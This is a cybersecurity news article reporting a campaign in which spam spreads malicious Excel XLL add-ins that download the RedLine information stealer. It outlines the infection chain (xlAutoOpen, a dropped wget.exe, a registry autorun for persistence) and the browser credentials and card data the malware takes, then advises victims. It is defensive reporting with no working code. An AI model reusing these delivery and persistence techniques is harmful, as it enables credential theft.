Infected Excel XLL Add-ins Distribute the RedLine Password-Stealing Malware

Infected Excel XLL Add-ins Distribute the RedLine Password-Stealing Malware

Discussion forums and contact forms are being spammed by cybercriminals to spread Excel XLL files that download and install the RedLine malware, which steals passwords and personal information.

RedLine is a data-stealing Trojan that takes cookies, user names and passwords, and credit card information from compromised web browsers, as well as FTP credentials and files. It can also conduct commands, download and launch more malware, and take pictures of the active Windows screen. All this information is gathered and returned to the attackers, who sell it on criminal markets or exploit it for other destructive and fraudulent purposes.

Various phishing lures, such as false advertising requests, Christmas gift suggestions, and website promotions, are spammed into contact forms. Threat actors have built bogus websites to host malicious Excel XLL files that implant malware in some phishing baits.

An XLL file is an add-in that allows programmers to enhance Excel’s capabilities by reading and writing data, importing data from other sources, and developing custom functions to do different tasks. When the add-in is opened, the XLL file runs containing an ‘xlAutoOpen’ function run by Microsoft Excel.

XLL file did not load successfully in tests done by security researcher TheAnalyst. Using the regsvr32.exe command or the ‘rundll32 name.xll, xlAutoOpen’ command to manually execute the DLL will extract the wget.exe program to the percent UserProfile percent folder, which can then be used to obtain the RedLine binary from a remote location. This malicious malware is stored as %UserProfile%\JavaBridge32.exe [VirusTotal] and then run.

Because of a Registry autorun entry, the RedLine information-stealer will also be launched automatically every time victims connect to Windows. Once activated, the malware will look for important data to steal, such as credentials and credit cards stored in Chrome, Firefox, Edge, Opera, and Brave browsers.

If you’ve been a victim of this campaign, assume that your passwords have been hacked and change them right away. Furthermore, if you have credit cards saved in your browsers, you should notify your credit card company of the event.

Threat actors can employ XLL files to conduct a range of harmful actions on a device since they are executables. As a result, you should only open one if it originates from a reliable source.

These files aren’t usually provided as attachments; instead, they’re installed using third-party software or a Windows administrator. So, if you get an email or other message that contains these sorts of files, delete it and report it as spam.

About the author

CIM Team

CIM Team

CyberIntelMag is the trusted authority in cybersecurity, comprised of leading industry experts for over 20 years, dedicated to serving cybersecurity professionals. Our goal is to provide a one-stop shop for knowledge and insight needed to navigate throughout today’s emerging cybersecurity landscape through in-depth coverage of breaking news, tutorials, product reviews, videos and industry influencers.